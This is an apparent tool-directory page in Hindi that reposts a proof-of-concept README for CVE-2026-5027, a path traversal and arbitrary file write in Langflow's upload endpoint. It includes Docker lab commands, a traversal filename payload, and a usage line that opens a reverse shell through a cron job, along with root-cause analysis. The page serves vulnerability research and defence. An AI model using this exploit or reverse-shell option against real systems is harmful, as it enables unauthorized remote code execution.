Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5027 — CVE-2026-5027 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow के /api/v2/files एंडपॉइंट में पाथ ट्रैवर्सल और आर्बिट्ररी फाइल राइट है, जिसमें Docker लैब और रिवर्स शेल विकल्प शामिल है। | Kitploit
उपकरण/GitHubGitHub/yym8538/cve-2026-5027
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubyym8538/cve-2026-5027

CVE-2026-5027

CVE-2026-5027 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow के /api/v2/files एंडपॉइंट में पाथ ट्रैवर्सल और आर्बिट्ररी फाइल राइट है, जिसमें Docker लैब और रिवर्स शेल विकल्प शामिल है।

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यह पोस्ट EQSTLab द्वारा प्रकाशित एक शोध लेख है।

Yahia Hamza को धन्यवाद, जिन्होंने इस भेद्यता की रिपोर्ट की और विश्लेषण किया।

CVE-2026-5027

★ CVE-2026-5027 Langflow पाथ ट्रैवर्सल / आर्बिट्ररी फ़ाइल राइट PoC ★ CVE-2026-5027 PoC test


विवरण

CVE-2026-5027 : Langflow आर्बिट्ररी फ़ाइल राइट भेद्यता

विवरण: Langflow <= 1.8.4 में एक पाथ ट्रैवर्सल भेद्यता हमलावरों को /api/v2/files एंडपॉइंट पर भेजे गए एक तैयार किए गए मल्टीपार्ट filename के माध्यम से इच्छित अपलोड निर्देशिका के बाहर मनमानी फ़ाइलें लिखने की अनुमति देती है। उन परिनियोजनों में जहाँ ऑटो-लॉगिन सक्षम है या प्रमाणीकरण अन्यथा कमजोर रूप से लागू किया गया है, इस समस्या का उपयोग हमलावर-नियंत्रित सामग्री को संवेदनशील फ़ाइलसिस्टम स्थानों पर लिखकर रिमोट कोड निष्पादन प्राप्त करने के लिए किया जा सकता है।


लैब सेटअप

Docker का उपयोग करके भेद्य वातावरण बनाएँ और चलाएँ:

इमेज बनाएँ

root@kitploit:~
docker build -t cve-2026-5027 .

कंटेनर चलाएँ

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

उपयोग कैसे करें

निष्पादित करें

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

विश्लेषण

भेद्य एंडपॉइंट

root@kitploit:~
POST /api/v2/files

यह समस्या इसलिए मौजूद है क्योंकि अपलोड कार्यक्षमता क्लाइंट द्वारा प्रदान किए गए मल्टीपार्ट filename मान पर भरोसा करती है। सुरक्षित सर्वर-साइड स्टोरेज नाम उत्पन्न करने या हल किए गए पथ को एक समर्पित अपलोड निर्देशिका तक सीमित करने के बजाय, भेद्य कोड पथ ../ जैसे ट्रैवर्सल अनुक्रमों को अंतिम गंतव्य पथ को प्रभावित करने की अनुमति देता है।

परिणामस्वरूप, एक हमलावर इच्छित स्टोरेज रूट से बाहर निकल सकता है और एप्लिकेशन को सर्वर फ़ाइलसिस्टम पर मनमानी स्थानों पर फ़ाइलें लिखने के लिए बाध्य कर सकता है।

एक प्रतिनिधि शोषण प्रवाह इस प्रकार है:

  1. सामान्य लॉगिन या ऑटो-लॉगिन-सक्षम परिनियोजन के माध्यम से एक एक्सेस टोकन प्राप्त करें।
  2. /api/v2/files पर एक मल्टीपार्ट अपलोड अनुरोध सबमिट करें।
  3. पाथ ट्रैवर्सल अनुक्रमों वाला एक तैयार किया गया filename प्रदान करें।
  4. Langflow को अपेक्षित स्टोरेज निर्देशिका के बाहर हमलावर-नियंत्रित सामग्री लिखने का कारण बनाएँ।

यह मूल रूप से एक CWE-22: Improper Limitation of a Pathname to a Restricted Directory समस्या है।

तकनीकी मूल कारण

यह सुरक्षा दोष अपलोड हैंडलिंग के दौरान उपयोगकर्ता-नियंत्रित फ़ाइल पथों के अपर्याप्त सैनिटाइज़ेशन और सत्यापन के कारण होता है। एप्लिकेशन मूल क्लाइंट फ़ाइलनाम स्वीकार करता है और पथ सामान्यीकरण और कंटेनमेंट को पर्याप्त रूप से लागू किए बिना इसे स्टोरेज वर्कफ़्लो में पास कर देता है।

रक्षात्मक दृष्टिकोण से, खतरनाक पैटर्न अवधारणात्मक रूप से निम्नलिखित के समान है:

root@kitploit:~
save_path = base_dir / file.filename

यदि file.filename में पाथ ट्रैवर्सल घटक जैसे:

root@kitploit:~
../../../../tmp/poc.txt

हैं, तो अंतिम हल किया गया पथ base_dir के बाहर इंगित कर सकता है, जिससे मनमानी फ़ाइल राइट सक्षम हो जाता है।

यह क्यों मायने रखता है

आर्बिट्ररी फ़ाइल राइट भेद्यताएँ अक्सर मानक अप्रतिबंधित अपलोड समस्याओं से अधिक गंभीर होती हैं क्योंकि हमलावर न केवल फ़ाइल सामग्री को नियंत्रित करता है, बल्कि गंतव्य पथ को भी नियंत्रित करता है। Langflow प्रक्रिया के रनटाइम विशेषाधिकारों के आधार पर, यह निम्नलिखित को सक्षम कर सकता है:

  • एप्लिकेशन फ़ाइलों को अधिलेखित करना
  • स्टार्टअप या शेड्यूल किए गए कार्य फ़ाइलों को संशोधित करना
  • शेल इनिशियलाइज़ेशन या की फ़ाइलों के माध्यम से दृढ़ता
  • आर्बिट्ररी फ़ाइल राइट से रिमोट कोड निष्पादन तक एस्केलेशन

परिदृश्य

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

अस्वीकरण

यह रिपॉज़िटरी Langflow इंस्टेंस के अनधिकृत शोषण को सुविधाजनक बनाने के लिए नहीं है। इस परियोजना का उद्देश्य सुरक्षा शोधकर्ताओं, रक्षकों और डेवलपर्स को भेद्यता को समझने, नियंत्रित वातावरणों में एक्सपोज़र को मान्य करने और प्रभावी शमन उपायों को लागू करने में मदद करना है।


संदर्भ

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

टूल डाउनलोड करें